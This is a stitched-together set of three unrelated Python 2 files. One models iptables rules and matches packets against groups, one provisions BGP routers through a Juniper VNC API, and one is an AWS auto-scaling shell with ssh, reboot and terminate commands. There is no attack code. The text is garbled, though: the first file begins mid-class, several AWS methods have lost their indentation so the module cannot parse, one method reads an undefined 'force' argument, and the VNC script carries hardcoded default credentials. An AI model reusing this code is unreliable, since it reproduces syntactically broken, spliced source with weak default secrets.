    def __init__(self, chain=None):
        # chain: owning Chain (also set when the rule is appended/inserted).
        self.chain = chain
        # Extra Match objects (dport/sport/src_range/...) for this rule.
        self._matches = []
        self._target = None
        self._proto = None
        self._src = None
        self._dst = None
        # -1 means "no source/destination group constraint" (see
        # Comparison.compare, which branches on sgroup != -1).
        self._sgroup = -1
        self._dgroup = -1
        self._isDefault = False
    def create_match(self, name):
        """Create a Match named *name*, attach it to this rule, return it."""
        match = Match(name)
        self.add_match(match)
        return match
    def add_match(self, match):
        """Attach an existing Match object to this rule."""
        match.rule = self
        self._matches.append(match)
    def remove_match(self, match):
        """Detach *match* from this rule."""
        self._matches.remove(match)
    # The getter/setter pairs below are part of the public interface and
    # are also exposed as plain properties.
    def _get_target(self):
        return self._target
    def _set_target(self, target):
        self._target = target
    target = property(_get_target, _set_target)
    def _get_proto(self):
        return self._proto
    def _set_proto(self, protocol):
        self._proto = protocol
    protocol = property(_get_proto, _set_proto)
    def get_src(self):
        return self._src
    def set_src(self, src):
        self._src = src
    src = property(get_src, set_src)
    def get_dst(self):
        return self._dst
    def set_dst(self, dst):
        self._dst = dst
    dst = property(get_dst, set_dst)
    def _get_sgroup(self):
        return self._sgroup
    def _set_sgroup(self, group):
        self._sgroup = group
    sgroup = property(_get_sgroup, _set_sgroup)
    def _get_dgroup(self):
        return self._dgroup
    def _set_dgroup(self, dgroup):
        self._dgroup = dgroup
    dgroup = property(_get_dgroup, _set_dgroup)
class Chain(object):
    """A named chain of rules inside a table.

    Instances are cached per "<table>.<chain>" key, so requesting the
    same chain of the same table twice yields the same object.
    """

    _cache = dict()

    def __new__(cls, table, name):
        key = table.name + "." + name
        obj = Chain._cache.get(key, None)
        if not obj:
            obj = object.__new__(cls)
            Chain._cache[key] = obj
            obj._rules = []
            # NOTE: __init__ runs automatically after __new__ returns an
            # instance of cls; the previous explicit obj.__init__(...)
            # call made it run twice for fresh instances.
        return obj

    def __init__(self, table, name):
        self.name = name
        self.table = table
        table.add_chain(self)

    def append_rule(self, rule):
        """Add *rule* at the end of the chain and take ownership of it."""
        self._rules.append(rule)
        rule.chain = self

    def insert_rule(self, rule, position=0):
        """Insert *rule* at *position* (default: top of the chain)."""
        self._rules.insert(position, rule)
        rule.chain = self

    def replace_rule(self, rule, position=0):
        """Overwrite the rule at *position* with *rule*."""
        self._rules[position] = rule
        rule.chain = self

    def get_rule(self, position=0):
        """Return the rule at *position*."""
        return self._rules[position]

    def delete_rule(self, position=-1):
        """Delete the rule at *position*; negative positions are rejected."""
        if position < 0:
            print("wrong position")
            return
        del self._rules[position]
class Table(object):
    """An iptables table (filter/mangle/raw/nat) holding named chains.

    Instances are cached by table name, so each table is a singleton.
    """

    FILTER = "filter"
    """This is the constant for the filter table."""
    MANGLE = "mangle"
    """This is the constant for the mangle table."""
    RAW = "raw"
    """This is the constant for the raw table."""
    NAT = "nat"
    """This is the constant for the nat table."""
    ALL = ["filter", "mangle", "raw", "nat"]

    _cache = dict()

    def __new__(cls, name):
        obj = Table._cache.get(name, None)
        if not obj:
            obj = object.__new__(cls)
            Table._cache[name] = obj
            obj.chains = dict()
            # __init__ runs automatically after __new__; the previous
            # explicit call made it run twice for fresh instances.
        return obj

    def __init__(self, name):
        self.name = name

    def add_chain(self, chain):
        """Register *chain* under its name; an existing chain is kept."""
        if chain.name not in self.chains:
            self.chains[chain.name] = chain

    def get_chain(self, chain_name):
        """Return the chain registered as *chain_name* (KeyError if absent)."""
        return self.chains[chain_name]

    def delete_chain(self, chain):
        """Remove *chain*; raises ValueError if it is not registered.

        Fixed: the original tested the misspelled ``self.chians`` and
        always crashed with AttributeError instead.
        """
        if chain.name not in self.chains:
            raise ValueError("nothing to delete")
        del self.chains[chain.name]
#Stores all the information for a given group in a group config file and provides an abstraction in case
#the format of the group data changes.
class GroupData(object):
    """Abstraction over a JSON group-configuration file.

    Each top-level key is a group name mapping to lists under "IPv4",
    "FQDN" and "Subnet". An entry wrapped in single quotes is treated
    as a regular expression; anything else is matched literally.
    """

    def __init__(self, groupFile):
        """Load group data from *groupFile* (path to a JSON file)."""
        with open(groupFile) as handle:
            self.data = json.load(handle)

    def isGroup(self, inputGroup):
        """Return True if *inputGroup* is a known group name."""
        return inputGroup in self.data

    def reload(self, fileName):
        """Re-read the group data from *fileName*."""
        with open(fileName) as handle:
            self.data = json.load(handle)

    def checkRe(self, value, pattern):
        """Match *value* against *pattern*.

        A pattern wrapped in single quotes is a regular expression
        (matched with re.match); any other pattern must compare equal
        to *value*.
        """
        starts_quoted = pattern[0] == "'"
        ends_quoted = pattern[len(pattern) - 1] == "'"
        if value == pattern and not starts_quoted and not ends_quoted:
            return True
        if starts_quoted and ends_quoted:
            if re.match(pattern[1:-1], value) is not None:
                return True
        return False

    def isIp(self, inputIp, groupName):
        """Return True if *inputIp* matches any IPv4 entry of the group."""
        for ip in self.data[groupName]["IPv4"]:
            if ip and self.checkRe(inputIp, ip):
                return True
        return False

    def isFQDN(self, inputIp, groupName):
        """Return True if the FQDN of *inputIp* matches a group FQDN entry."""
        try:
            inputFQDN = socket.getfqdn(str(inputIp))
        except Exception:
            return False
        fqdnList = self.data[groupName]["FQDN"]
        if not fqdnList:
            return False
        for fqdn in fqdnList:
            if fqdn and self.checkRe(inputFQDN, fqdn):
                return True
        return False

    def isSubnet(self, inputIp, groupName):
        """Return True if *inputIp* falls inside any subnet of the group."""
        address = IPAddress(inputIp)
        for subnet in self.data[groupName]["Subnet"]:
            try:
                network = IPNetwork(subnet)
            except Exception:
                continue
            # Membership test instead of iterating every address in the
            # subnet, which was O(2^(32-prefix)) per entry.
            if address in network:
                return True
        return False
class Comparison(object):
    """Matches candidate packets (proto/src/dst/ports) against the rules
    held in a Table, using GroupData and optional plugins for
    group-based rules.
    """
    def __init__(self, table,groupData):
        # table: Table whose chains/rules are compared against.
        # groupData: GroupData instance used for group-based rules.
        self.table = table
        self.groupData = groupData
        self.plugins = {}
        try:
            self.loadPlugins(self.plugins)
        except:
            # Best effort: a missing plugin dir or broken plugin is ignored.
            pass
    def loadPlugins(self,pluginList):
        """Import every .py file in PLUGINPATH and store its Plugin() by name."""
        sys.path.insert(0,PLUGINPATH)
        for file in os.listdir(PLUGINPATH):
            fname,ext = os.path.splitext(file)
            if ext == ".py":
                mod = __import__(fname)
                pluginList[fname] = mod.Plugin()
        sys.path.pop(0)
        print "Plugins",pluginList
    def portMatch(self, portnum, portRange):
        """Return True if *portnum* satisfies *portRange*.

        portRange holds 0 (wildcard), 1 (exact port) or 2 (inclusive
        range) numeric strings; a portnum of -1 matches anything.
        """
        ports = [int(s) for s in portRange]
        print "INPUT PORTS",ports
        print "COMPARISION PORT",portnum
        if len(ports) == 0 or portnum == -1:
            print "PORTS MATCHED0"
            return True
        elif len(ports) == 1:
            if portnum == ports[0]:
                print "PORTS MATCHED1"
                return True
        else:
            if portnum >= ports[0] and portnum <= ports[1]:
                print "PORTS MATCHED"
                return True
        print "PORTS NOT MATCHED"
        return False
    #Is the input a valid ip address? If so return false as it can't be a dns hostname.
    def isDNS(self,str):
        try:
            IP(str)
        except ValueError:
            return True
        return False
    #Take in an ip and get the right hostname, use this to compare to a hostname that might be in a group list.
    def hasHostname(self,ip):
        # Returns (True, hostname) or (False, None).
        try:
            socket.gethostbyaddr(str(ip))
        except:
            return (False,None)
        return (True,(socket.gethostbyaddr(str(ip))[0]))
    # ipMatch1 is used to test -s with ip subnet
    def ipMatch1(self, ip, cmpIP):
        """Return True if *ip* equals *cmpIP* or lies in the cmpIP subnet."""
        print "IN IPMATCH1"
        # None or the all-zero subnet means "any source/destination".
        if cmpIP == None or cmpIP == '0.0.0.0/0.0.0.0':
            print "Blank or None cmpIP"
            return True
        if ip == None:
            return False
        if self.isDNS(str(cmpIP)):
            # The rule target is a hostname: resolve before comparing.
            cmpIP = socket.gethostbyname(str(cmpIP))
        if '/' in cmpIP:
            ipset = IPSet([cmpIP])
            if ip in ipset:
                return True
        else:
            if ip == cmpIP:
                print "RETURNING TRUE IPMATCH1"
                return True
        print "RETURING FALSE IPMATCH1"
        return False
    #ipMatch2 is used to test ipRange
    def ipMatch2(self, ip, ipRange):
        """Return True if *ip* is inside the 0/1/2-element *ipRange* list."""
        if len(ipRange) == 0:
            return True
        if ip == None:
            return False
        if len(ipRange) == 2:
            iprange = IPRange(ipRange[0], ipRange[1])
            if ip in iprange:
                return True
        elif ip == ipRange[0]:
            return True
        return False
    #Test if two ips are from the same group file
    def groupMatch(self,sIp,dIp,sGroup,dGroup):
        """Return True if sIp belongs to sGroup AND dIp belongs to dGroup."""
        sGroupMatch = False
        dGroupMatch = False
        if (self.groupData.isGroup(sGroup) == False) or (self.groupData.isGroup(dGroup) == False):
            return False
        else:
            #Verify the source ip has a match in some group
            #self.groupData.__getattribute__('isIp')
            if (self.groupData.isIp(sIp,sGroup)):
                sGroupMatch = True
            elif (self.groupData.isFQDN(sIp,sGroup)):
                sGroupMatch = True
            elif (self.groupData.isSubnet(sIp,sGroup)):
                sGroupMatch = True
            #Assume that each plugin vas a verify method for checking if an ip is in a group and use it
            else:
                for plugin in self.plugins.values():
                    try:
                        if plugin.verify(sIp,sGroup):
                            sGroupMatch = True
                    except:
                        print "Error in plugin:",self.plugins.keys()[self.plugins.values().index(plugin)], "when matching source group"
                        continue
            #Verify the destination ip has a match in some group
            if (self.groupData.isIp(dIp,dGroup)):
                dGroupMatch = True
            elif (self.groupData.isFQDN(dIp,dGroup)):
                dGroupMatch = True
            elif (self.groupData.isSubnet(dIp,dGroup)):
                dGroupMatch = True
            #Is the destination ip and group verified by a plugin method?
            else:
                for plugin in self.plugins.values():
                    try:
                        if plugin.verify(dIp,dGroup):
                            dGroupMatch = True
                    except:
                        print "Error in plugin:",self.plugins.keys()[self.plugins.values().index(plugin)], "when matching destination group"
                        continue
            if sGroupMatch and dGroupMatch:
                return True
            else:
                return False
    def compare(self, proto, tsIp=None, tdIp=None, tsPort=-1, tdPort=-1):
        """Walk every chain and rule; return the first matching rule.

        Returns a dict with src/dst/proto/target for the first rule the
        candidate packet matches, or an empty dict when nothing matches.
        """
        matched_rule = {}
        for key in self.table.chains:
            print "KEY ",key
            chain = self.table.chains[key]
            for rule in chain._rules:
                dport = []
                sport = []
                srange = []
                drange = []
                src = rule.src
                dst = rule.dst
                sgroup = rule.sgroup
                print "SGROUP: ", rule.sgroup
                dgroup = rule.dgroup
                print "DGROUP: ", rule.dgroup
                if proto != rule.protocol:
                    continue
                # Collect port / ip-range constraints from the rule's matches.
                for match in rule._matches:
                    if 'dport' in dir(match):
                        dport = match.dport.split(':')
                    if 'sport' in dir(match):
                        sport = match.sport.split(':')
                    if 'src_range' in dir(match):
                        srange = match.src_range.split('-')
                    if 'dst_range' in dir(match):
                        drange = match.dst_range.split('-')
                print "RULE.sGROUP ",rule.sgroup
                print "RULE.dGROUP ",rule.dgroup
                # Group-based rule: sgroup/dgroup set (-1 means unset).
                if rule.sgroup != -1:
                    print "tsIp=",tsIp
                    print "tdIp=",tdIp
                    print "sgroup=",sgroup
                    print "dgroup=",dgroup
                    print "sport=",sport
                    print "dport=",dport
                    print "tsPort=",tsPort
                    print "tdPort=",tdPort
                    print "ruleSource=", src
                    print "ruleDst=", dst
                    if (self.groupMatch(tsIp,tdIp,sgroup,dgroup)) and (self.portMatch(tsPort, sport)) and (self.portMatch(tdPort, dport)):
                        matched_rule['src'] = tsIp
                        matched_rule['dst'] = tdIp
                        matched_rule['proto'] = rule.protocol
                        matched_rule['target'] = rule.target
                        return matched_rule
                # Address-based rule: compare literal src/dst and ranges.
                elif rule.sgroup == -1:
                    print "GOT INTO ELSE"
                    print "tsIp=",tsIp
                    print "tdIp=",tdIp
                    print "sgroup=",sgroup
                    print "dgroup=",dgroup
                    print "ruleSource=", src
                    print "ruleDst=", dst
                    if (self.ipMatch1(tsIp, src)) and (self.ipMatch1(tdIp, dst)) \
                            and (self.portMatch(tsPort, sport)) and (self.portMatch(tdPort, dport)) \
                            and (self.ipMatch2(tsIp, srange)) and (self.ipMatch2(tdIp, drange)):
                        matched_rule['src'] = tsIp
                        matched_rule['dst'] = tdIp
                        matched_rule['proto'] = rule.protocol
                        matched_rule['target'] = rule.target
                        print "TARGET THING2 " , rule.target
                        return matched_rule
        return matched_rule
| |
#!/usr/bin/python
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import argparse
import ConfigParser
import copy
import json
import sys

from netaddr import IPNetwork
from vnc_api.vnc_api import *
def get_ip(ip_w_pfx):
    """Return the bare IP portion of an address given in CIDR form."""
    network = IPNetwork(ip_w_pfx)
    return str(network.ip)
# end get_ip
class VncProvisioner(object):
    """Provisions BGP routers and vrouters into a VNC API server.

    Reads a JSON provisioning file describing hosts and their roles,
    updates the global system config (ASN, optional iBGP auto-mesh)
    and registers every bgp/compute host, full-meshing BGP routers.
    """

    def __init__(self, args_str=None):
        self._args = None
        if not args_str:
            args_str = ' '.join(sys.argv[1:])
        self._parse_args(args_str)
        self._prov_info = self._read_provision_data()
        prov_info = self._prov_info
        # BGP sessions announce the inet-vpn address family only.
        self._bgp_addr_fams = AddressFamilies(['inet-vpn'])
        self._bgp_sess_attrs = [
            BgpSessionAttributes(address_families=self._bgp_addr_fams)]
        self._bgp_sessions = [BgpSession(attributes=self._bgp_sess_attrs)]
        self._bgp_peering_attrs = BgpPeeringAttributes(
            session=self._bgp_sessions)
        self._vnc_lib = VncApi(self._args.admin_user,
                               self._args.admin_password,
                               self._args.admin_tenant_name,
                               self._args.api_server_ip,
                               self._args.api_server_port, '/')
        vnc_lib = self._vnc_lib
        gsc_obj = vnc_lib.global_system_config_read(
            fq_name=['default-global-system-config'])
        gsc_obj.set_autonomous_system(prov_info['bgp-asn'])
        if 'ibgp-auto-mesh' in prov_info:
            # Fixed: previously read the misspelled name ``prov_infoi``,
            # which raised NameError whenever the key was present.
            gsc_obj.set_ibgp_auto_mesh(prov_info['ibgp-auto-mesh'])
        vnc_lib.global_system_config_update(gsc_obj)
        self._global_system_config_obj = gsc_obj
        # TODO pick fqname hardcode from common
        rt_inst_obj = vnc_lib.routing_instance_read(
            fq_name=['default-domain', 'default-project',
                     'ip-fabric', '__default__'])
        self._fab_rt_inst_obj = rt_inst_obj
        # BGP routers must exist before vrouters can reference them, so
        # compute roles are deferred to a second pass.
        vrouter_hosts = []
        for host in prov_info['hosts']:
            for role in host['roles']:
                if role['type'] == 'bgp':
                    self.add_bgp_router(host['name'], host['ip'])
                elif role['type'] == 'compute':
                    vrouter_hosts.append((host, role))
        for host, role in vrouter_hosts:
            self.add_vrouter(host['name'], host['ip'], role['params']['bgp'])
    # end __init__

    def add_vrouter(self, name, ip, bgps):
        """Create a virtual router at *ip* referencing the named BGP peers."""
        vnc_lib = self._vnc_lib
        gsc_obj = self._global_system_config_obj
        vrouter_obj = VirtualRouter(
            name, gsc_obj, virtual_router_ip_address=ip)
        for bgp in bgps:
            bgp_router_fq_name = copy.deepcopy(
                self._fab_rt_inst_obj.get_fq_name())
            bgp_router_fq_name.append(bgp)
            bgp_router_obj = vnc_lib.bgp_router_read(
                fq_name=bgp_router_fq_name)
            vrouter_obj.add_bgp_router(bgp_router_obj)
        vnc_lib.virtual_router_create(vrouter_obj)
    # end add_vrouter

    def add_bgp_router(self, name, ip):
        """Create a BGP router and full-mesh it with the existing ones."""
        vnc_lib = self._vnc_lib
        gsc_obj = self._global_system_config_obj
        router_params = BgpRouterParams(
            autonomous_system=gsc_obj.get_autonomous_system(),
            identifier=get_ip(ip), address=get_ip(ip), port=179,
            address_families=self._bgp_addr_fams)
        bgp_router_obj = BgpRouter(name, self._fab_rt_inst_obj,
                                   bgp_router_parameters=router_params)
        cur_id = vnc_lib.bgp_router_create(bgp_router_obj)
        cur_obj = vnc_lib.bgp_router_read(id=cur_id)
        # full-mesh with existing bgp routers
        fq_name = self._fab_rt_inst_obj.get_fq_name()
        bgp_router_list = vnc_lib.bgp_routers_list(
            routing_instance_fq_name=fq_name)
        bgp_router_ids = [bgp_dict['uuid']
                          for bgp_dict in bgp_router_list['bgp-routers']]
        bgp_router_objs = [vnc_lib.bgp_router_read(id=router_id)
                           for router_id in bgp_router_ids]
        for other_obj in bgp_router_objs:
            if other_obj.uuid == cur_id:
                continue
            # Peer both directions: the existing router with the new one
            # and the new one with the existing router.
            other_obj.add_bgp_router(cur_obj, self._bgp_peering_attrs)
            vnc_lib.bgp_router_update(other_obj)
            cur_obj.add_bgp_router(other_obj, self._bgp_peering_attrs)
        vnc_lib.bgp_router_update(cur_obj)
    # end add_bgp_router

    def _parse_args(self, args_str):
        '''
        Eg. python provision.py --prov_data_file provision.json
                                --api_server_ip 127.0.0.1
                                --api_server_port 8082
        '''
        # Source any specified config/ini file
        # Turn off help, so we print all options in response to -h
        conf_parser = argparse.ArgumentParser(add_help=False)
        conf_parser.add_argument("-c", "--conf_file",
                                 help="Specify config file", metavar="FILE")
        args, remaining_argv = conf_parser.parse_known_args(args_str.split())
        defaults = {
            'prov_data_file': 'provision.json',
            'api_server_ip': '127.0.0.1',
            'api_server_port': '8082',
        }
        ksopts = {
            'admin_user': 'user1',
            'admin_password': 'password1',
            'admin_tenant_name': 'default-domain'
        }
        if args.conf_file:
            config = ConfigParser.SafeConfigParser()
            config.read([args.conf_file])
            defaults.update(dict(config.items("DEFAULTS")))
            if 'KEYSTONE' in config.sections():
                ksopts.update(dict(config.items("KEYSTONE")))
        # Override with CLI options
        # Don't suppress add_help here so it will handle -h
        parser = argparse.ArgumentParser(
            # Inherit options from config_parser
            parents=[conf_parser],
            # print script description with -h/--help
            description=__doc__,
            # Don't mess with format of description
            formatter_class=argparse.RawDescriptionHelpFormatter,
        )
        defaults.update(ksopts)
        parser.set_defaults(**defaults)
        parser.add_argument(
            "--prov_data_file", help="File name of provision data in json")
        parser.add_argument(
            "--api_server_ip", help="IP address of api server")
        parser.add_argument("--api_server_port", help="Port of api server")
        parser.add_argument(
            "--admin_user", help="Name of keystone admin user")
        parser.add_argument(
            "--admin_password", help="Password of keystone admin user")
        parser.add_argument(
            "--admin_tenant_name", help="Tenant name for keystone admin user")
        self._args = parser.parse_args(remaining_argv)
    # end _parse_args

    def _read_provision_data(self):
        """Load and parse the JSON provisioning file (closing the handle)."""
        with open(self._args.prov_data_file, 'r') as prov_file:
            return json.loads(prov_file.read())
    # end _read_provision_data
# end class VncProvisioner
def main(args_str=None):
    """Entry point: construct a VncProvisioner from CLI arguments."""
    VncProvisioner(args_str)
# end main
if __name__ == "__main__":
    main()
| |
from AwsProcessor import *
from stdplusAwsHelpers.AwsConnectionFactory import AwsConnectionFactory
from CommandArgumentParser import *
from joblib import Parallel, delayed
import boto3
import stdplus
import Config
class AwsAutoScalingGroup(AwsProcessor):
    def __init__(self,scalingGroup,parent):
        """Shell node for one auto-scaling group; prompt shows the ASG name."""
        AwsProcessor.__init__(self,parent.raw_prompt + "/asg:" + scalingGroup,parent)
        self.client = AwsConnectionFactory.getAsgClient()
        self.scalingGroup = scalingGroup
        # Cached describe_scaling_activities result; filled lazily.
        self.activities = None
        # Primes self.scalingGroupDescription and lists the instances.
        self.do_printInstances('-r')
    def do_printActivities(self,args):
        """Print scaling activities"""
        parser = CommandArgumentParser("printActivities")
        parser.add_argument('-r','--refresh',action='store_true',dest='refresh',help='refresh');
        args = vars(parser.parse_args(args))
        # Re-fetch when asked to, or on first use (nothing cached yet).
        refresh = args['refresh'] or not self.activities
        if refresh:
            response = self.client.describe_scaling_activities(AutoScalingGroupName=self.scalingGroup)
            self.activities = response['Activities']
        index = 0
        for activity in self.activities:
            # EndTime is absent while an activity is still in progress.
            print "{}: {} -> {} {}: {}".format(index,activity['StartTime'],stdplus.defaultifyDict(activity,'EndTime',''),activity['StatusCode'],activity['Description'])
            index = index + 1
    def do_printActivity(self,args):
        """Print scaling activity details"""
        parser = CommandArgumentParser("printActivity")
        # Positional: index into the list shown by do_printActivities.
        parser.add_argument(dest='index',type=int,help='refresh');
        args = vars(parser.parse_args(args))
        index = args['index']
        # NOTE(review): assumes do_printActivities ran first; otherwise
        # self.activities is still None and indexing raises TypeError.
        activity = self.activities[index]
        pprint(activity)
    def do_printInstances(self,args):
        """Print the list of instances in this auto scaling group. printInstances -h for detailed help"""
        parser = CommandArgumentParser("printInstances")
        parser.add_argument(dest='filters',nargs='*',default=["*"],help='Filter instances');
        parser.add_argument('-a','--addresses',action='store_true',dest='addresses',help='list all ip addresses');
        parser.add_argument('-t','--tags',action='store_true',dest='tags',help='list all instance tags');
        parser.add_argument('-d','--allDetails',action='store_true',dest='details',help='print all instance details');
        parser.add_argument('-r','--refresh',action='store_true',dest='refresh',help='refresh');
        parser.add_argument('-z','--zones',dest='availabilityZones',nargs='+',help='Only include specified availability zones');
        args = vars(parser.parse_args(args))
        client = AwsConnectionFactory.getEc2Client()
        filters = args['filters']
        addresses = args['addresses']
        tags = args['tags']
        details = args['details']
        availabilityZones = args['availabilityZones']
        # A per-instance describe_instances call is only needed when
        # addresses, tags or full details were requested.
        needDescription = addresses or tags or details
        if args['refresh']:
            self.scalingGroupDescription = self.client.describe_auto_scaling_groups(AutoScalingGroupNames=[self.scalingGroup])
        # print "AutoScaling Group:{}".format(self.scalingGroup)
        print "=== Instances ==="
        instances = self.scalingGroupDescription['AutoScalingGroups'][0]['Instances']
        # Glob-style filtering on instance id and (optionally) AZ.
        instances = filter( lambda x: fnmatches(x['InstanceId'],filters),instances)
        if availabilityZones:
            instances = filter( lambda x: fnmatches(x['AvailabilityZone'],availabilityZones),instances)
        index = 0
        for instance in instances:
            # Remember the printed index so other commands (ssh, reboot,
            # terminate, ...) can refer to instances by number.
            instance['index'] = index
            print "* {0:3d} {1} {2} {3}".format(index,instance['HealthStatus'],instance['AvailabilityZone'],instance['InstanceId'])
            description = None
            if needDescription:
                description = client.describe_instances(InstanceIds=[instance['InstanceId']])
            if addresses:
                networkInterfaces = description['Reservations'][0]['Instances'][0]['NetworkInterfaces']
                number = 0
                print "    Network Interfaces:"
                for interface in networkInterfaces:
                    print "    * {0:3d} {1}".format(number, interface['PrivateIpAddress'])
                    number +=1
            if tags:
                # NOTE(review): this rebinds the boolean 'tags' flag to the
                # tag list, so later instances use the previous instance's
                # list truthiness instead of the CLI flag — confirm intended.
                tags = description['Reservations'][0]['Instances'][0]['Tags']
                print "    Tags:"
                for tag in tags:
                    print "    * {0} {1}".format(tag['Key'],tag['Value'])
            if details:
                pprint(description)
            index += 1
    def do_printPolicy(self,args):
        """Print the autoscaling policy"""
        parser = CommandArgumentParser("printPolicy")
        args = vars(parser.parse_args(args))
        # Dump the raw describe_policies response for this ASG.
        policy = self.client.describe_policies(AutoScalingGroupName=self.scalingGroup)
        pprint(policy)
def do_rebootInstance(self,args):
"""Restart specified instance"""
parser = CommandArgumentParser("rebootInstance")
parser.add_argument(dest='instance',help='instance index or name');
args = vars(parser.parse_args(args))
instanceId = args['instance']
try:
index = int(instanceId)
instances = self.scalingGroupDescription['AutoScalingGroups'][0]['Instances']
instanceId = instances[index]
except ValueError:
pass
client = AwsConnectionFactory.getEc2Client()
client.reboot_instances(InstanceIds=[instanceId['InstanceId']])
    def do_setDesiredCapacity(self,args):
        """Set the desired capacity"""
        parser = CommandArgumentParser("setDesiredCapacity")
        parser.add_argument(dest='value',type=int,help='new value');
        args = vars(parser.parse_args(args))
        value = int(args['value'])
        print "Setting desired capacity to {}".format(value)
        client = AwsConnectionFactory.getAsgClient()
        # HonorCooldown: let the ASG's cooldown timers delay the change.
        client.set_desired_capacity(AutoScalingGroupName=self.scalingGroup,DesiredCapacity=value,HonorCooldown=True)
        print "Scaling activity in progress"
    def do_run(self,args):
        """SSH to each instance in turn and run specified command"""
        parser = CommandArgumentParser("run")
        parser.add_argument('-R','--replace-key',dest='replaceKey',default=False,action='store_true',help="Replace the host's key. This is useful when AWS recycles an IP address you've seen before.")
        parser.add_argument('-Y','--keyscan',dest='keyscan',default=False,action='store_true',help="Perform a keyscan to avoid having to say 'yes' for a new host. Implies -R.")
        parser.add_argument('-ii','--ignore-host-key',dest='ignore-host-key',default=False,action='store_true',help='Ignore host key')
        parser.add_argument('-ne','--no-echo',dest='no-echo',default=False,action='store_true',help='Do not echo command')
        parser.add_argument(dest='command',nargs='+',help="Command to run on all hosts.") # consider adding a filter option later
        parser.add_argument('-v',dest='verbosity',default=0,action=VAction,nargs='?',help='Verbosity. The more instances, the more verbose');
        parser.add_argument('-j',dest='jobs',type=int,default=1,help='Number of hosts to contact in parallel');
        parser.add_argument('-s',dest='skip',type=int,default=0,help='Skip this many hosts');
        parser.add_argument('-m',dest='macro',default=False,action='store_true',help='{command} is a series of macros to execute, not the actual command to run on the host');
        args = vars(parser.parse_args(args))
        replaceKey = args['replaceKey']
        keyscan = args['keyscan']
        verbosity = args['verbosity']
        jobs = args['jobs']
        skip = args['skip']
        ignoreHostKey = args['ignore-host-key']
        noEcho = args['no-echo']
        # Operates on the instance list cached by do_printInstances
        # (which also assigns each instance its 'index').
        instances = self.scalingGroupDescription['AutoScalingGroups'][0]['Instances']
        instances = instances[skip:]
        # if replaceKey or keyscan:
        #     for instance in instances:
        #         stdplus.resetKnownHost(instance)
        if args['macro']:
            if len(args['command']) > 1:
                print("Only one macro may be specified with the -m switch.")
                return
            else:
                # Expand the single macro name into the configured command.
                macro = args['command'][0]
                print("Macro:{}".format(macro))
                command = Config.config['ssh-macros'][macro]
        else:
            command = ' '.join(args['command'])
        # Fan out over the hosts with joblib, -j at a time; each line of
        # output is prefixed with "<index>:<instance-id>: ".
        Parallel(n_jobs=jobs)(
            delayed(ssh)(instance['InstanceId'],0,[],replaceKey,keyscan,False,verbosity,command,ignoreHostKey=ignoreHostKey,echoCommand=not noEcho,name="{}:{}: ".format(instance['index'],instance['InstanceId'])) for instance in instances
        )
    def do_ssh(self,args):
        """SSH to an instance. ssh -h for detailed help"""
        parser = CommandArgumentParser("ssh")
        parser.add_argument(dest='instance',help='instance index or name');
        parser.add_argument('-a','--address-number',default='0',dest='interface-number',help='instance id of the instance to ssh to');
        parser.add_argument('-ii','--ignore-host-key',dest='ignore-host-key',default=False,action='store_true',help='Ignore host key')
        parser.add_argument('-ne','--no-echo',dest='no-echo',default=False,action='store_true',help='Do not echo command')
        parser.add_argument('-L',dest='forwarding',nargs='*',help="port forwarding string of the form: {localport}:{host-visible-to-instance}:{remoteport} or {port}")
        parser.add_argument('-R','--replace-key',dest='replaceKey',default=False,action='store_true',help="Replace the host's key. This is useful when AWS recycles an IP address you've seen before.")
        parser.add_argument('-Y','--keyscan',dest='keyscan',default=False,action='store_true',help="Perform a keyscan to avoid having to say 'yes' for a new host. Implies -R.")
        parser.add_argument('-B','--background',dest='background',default=False,action='store_true',help="Run in the background. (e.g., forward an ssh session and then do other stuff in aws-shell).")
        parser.add_argument('-v',dest='verbosity',default=0,action=VAction,nargs='?',help='Verbosity. The more instances, the more verbose');
        parser.add_argument('-m',dest='macro',default=False,action='store_true',help='{command} is a series of macros to execute, not the actual command to run on the host');
        parser.add_argument(dest='command',nargs='*',help="Command to run on all hosts.") # consider adding a filter option later
        args = vars(parser.parse_args(args))
        interfaceNumber = int(args['interface-number'])
        forwarding = args['forwarding']
        replaceKey = args['replaceKey']
        keyscan = args['keyscan']
        background = args['background']
        verbosity = args['verbosity']
        ignoreHostKey = args['ignore-host-key']
        noEcho = args['no-echo']
        # Figure out the host to connect to:
        target = args['instance']
        try:
            # Numeric argument: resolve it as an index into the cached
            # instance list; otherwise use the argument verbatim.
            index = int(args['instance'])
            instances = self.scalingGroupDescription['AutoScalingGroups'][0]['Instances']
            instance = instances[index]
            target = instance['InstanceId']
        except ValueError: # if args['instance'] is not an int, for example.
            pass
        if args['macro']:
            if len(args['command']) > 1:
                print("Only one macro may be specified with the -m switch.")
                return
            else:
                # Expand the single macro name into the configured command.
                macro = args['command'][0]
                print("Macro:{}".format(macro))
                command = Config.config['ssh-macros'][macro]
        else:
            command = ' '.join(args['command'])
        ssh(target,interfaceNumber,forwarding,replaceKey,keyscan,background,verbosity,command,ignoreHostKey=ignoreHostKey,echoCommand = not noEcho)
def do_startInstance(self,args):
"""Start specified instance"""
parser = CommandArgumentParser("startInstance")
parser.add_argument(dest='instance',help='instance index or name');
args = vars(parser.parse_args(args))
instanceId = args['instance']
force = args['force']
try:
index = int(instanceId)
instances = self.scalingGroupDescription['AutoScalingGroups'][0]['Instances']
instanceId = instances[index]
except ValueError:
pass
client = AwsConnectionFactory.getEc2Client()
client.start_instances(InstanceIds=[instanceId['InstanceId']])
def do_stopInstance(self,args):
"""Stop specified instance"""
parser = CommandArgumentParser("stopInstance")
parser.add_argument(dest='instance',help='instance index or name');
parser.add_argument('-f','--force',action='store_true',dest='force',help='instance index or name');
args = vars(parser.parse_args(args))
instanceId = args['instance']
force = args['force']
try:
index = int(instanceId)
instances = self.scalingGroupDescription['AutoScalingGroups'][0]['Instances']
instanceId = instances[index]
except ValueError:
pass
client = AwsConnectionFactory.getEc2Client()
client.stop_instances(InstanceIds=[instanceId['InstanceId']],Force=force)
def do_terminateInstance(self,args):
"""Terminate an EC2 instance"""
parser = CommandArgumentParser("terminateInstance")
parser.add_argument(dest='instance',help='instance index or name');
args = vars(parser.parse_args(args))
instanceId = args['instance']
try:
index = int(instanceId)
instances = self.scalingGroupDescription['AutoScalingGroups'][0]['Instances']
instanceId = instances[index]
except ValueError:
pass
client = AwsConnectionFactory.getEc2Client()
client.terminate_instances(InstanceIds=[instanceId['InstanceId']])
self.do_printInstances("-r")
    def do_updateCapacity(self,args):
        """Set the min/max/desired capacity of the current auto-scaling group."""
        parser = CommandArgumentParser("updateMinMax")
        parser.add_argument('-m','--min',dest='min',type=int,help='new values');
